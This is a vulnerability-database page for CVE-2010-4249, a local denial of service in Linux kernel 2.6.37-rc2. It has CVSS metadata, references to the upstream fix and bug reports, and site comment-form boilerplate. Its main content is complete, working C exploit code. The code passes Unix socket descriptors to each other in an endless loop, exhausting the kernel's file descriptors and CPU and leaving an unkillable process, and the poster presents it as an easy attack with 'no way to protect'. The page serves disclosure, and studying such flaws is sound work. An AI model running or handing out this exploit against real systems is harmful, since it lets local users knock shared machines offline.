Linux Kernel 2.6.37:rc2 Unix Sockets Local Denial of Service

2010-12-01 / 2010-12-02

Credit: Key Night

Risk: Low

Local: Yes

Remote: No

CVE: CVE-2010-4249

CWE: CWE-399

Ogólna skala CVSS: 4.9/10

Znaczenie: 6.9/10

Łatwość wykorzystania: 3.9/10

Wymagany dostęp: Lokalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Brak

Wpływ na integralność: Brak

Wpływ na dostępność: Pełny

Simple kernel attack using socketpair. easy, 100% reproductiblle, works
under guest. no way to protect :(

Simple kernel attack using socketpair. easy, 100% reproductiblle,
works under guest. no way to protect :(

See source attached.

Process become in state 'Running' but not killalble via kill -KILL.

eat 100% CPU, eat all available internal  file descriptors  in kernel :(

-- 
Segmentation fault

#include <sys/socket.h>
#include <sys/un.h>

static int send_fd (int unix_fd, int fd)
{
  struct msghdr msgh;
  struct cmsghdr *cmsg;
  char buf[CMSG_SPACE (sizeof (fd))];
  memset (&msgh, 0, sizeof (msgh));

  memset (buf, 0, sizeof (buf));

  msgh.msg_control = buf;
  msgh.msg_controllen = sizeof (buf);

  cmsg = CMSG_FIRSTHDR (&msgh);
  cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
  cmsg->cmsg_level = SOL_SOCKET;

  cmsg->cmsg_type = SCM_RIGHTS;

  msgh.msg_controllen = cmsg->cmsg_len;

  memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
  return sendmsg (unix_fd, &msgh, 0);
}

int main ()
{
  int fd[2], ff[2];

  int target;
  if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)
    return 1;
  for (;;)
  {
    if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
        return 2;
    send_fd (ff[0], fd[0]);
    send_fd (ff[0], fd[1]);

    close (fd[1]);
    close (fd[0]);
    fd[0] = ff[0];
    fd[1] = ff[1];
  }
}

Referencje:

https://bugzilla.redhat.com/show_bug.cgi?id=656756

http://www.openwall.com/lists/oss-security/2010/11/24/10

http://www.kernel.org/pub/linux/kernel/v2.6/next/patch-v2.6.37-rc3-next-20101125.bz2

http://marc.info/?l=linux-netdev&m=129059035929046&w=2

http://lkml.org/lkml/2010/11/23/450

http://git.kernel.org/?p=linux/kernel/git/davem/net-2.6.git;a=commit;h=9915672d41273f5b77f1b3c29b391ffb7732b84b

http://www.securityfocus.com/bid/45037

http://www.openwall.com/lists/oss-security/2010/11/24/2

http://www.exploit-db.com/exploits/15622/

http://lkml.org/lkml/2010/11/25/8

http://lkml.org/lkml/2010/11/23/395

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Linux Kernel 2.6.37:rc2 Unix Sockets Local Denial of Service

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.